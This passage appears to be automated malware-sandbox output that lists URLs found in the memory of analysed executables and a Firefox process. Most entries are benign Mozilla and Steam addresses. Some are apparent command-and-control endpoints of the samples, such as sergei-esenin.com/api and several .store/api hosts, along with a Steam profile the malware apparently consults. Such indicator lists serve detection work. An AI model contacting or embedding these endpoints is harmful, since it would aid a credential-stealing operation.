Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeDownloadsNumber
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema9e34c6e7-cbed-40a0-ba63-35488e171013
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schemaplaces.sqlite#1:
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schemaInstance
Source: firefox.exe, 00000019.00000002.3212088347.000001379F303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.3212088347.000001379F303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0EBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234139332.00000137A0D61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F23D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comresource://normandy/lib/CleanupManager.sys.mjsenv.channel
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E8D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mobbipenju.store:443/api
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3181915988.000001379A8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E644000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/TOAST_NOTIFICATION_TELEMETRY
Source: file.exe, 00000000.00000003.2201376097.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147845498.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150935247.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151059602.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148082112.0000000005A37000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236788761.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151283183.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201376097.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236788761.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/W
Source: file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000000.00000003.2167545129.00000000010E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/oon
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/api
Source: file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apiMicrosoft
Source: file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apitPK
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000019.00000002.3240318696.00000137A1B49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3268801585.00000137A9257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3074602555.00000137A92F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/apix%
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Endpoint
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A698F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:disabled_picture_in_picture_overrides.dailymotiondisabled_picture_
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_EXPERIMENT_DATAdiscoverystream.spoc.impressionsAS_R
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923349387.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/=q
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724
Source: 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923349387.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923349387.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900-q
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 976d9f40c1.exe, 00000009.00000002.2806226818.00000000016B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900?
Source: 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923405378.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/re
Source: 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/w.EE
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923405378.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac4
Source: 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
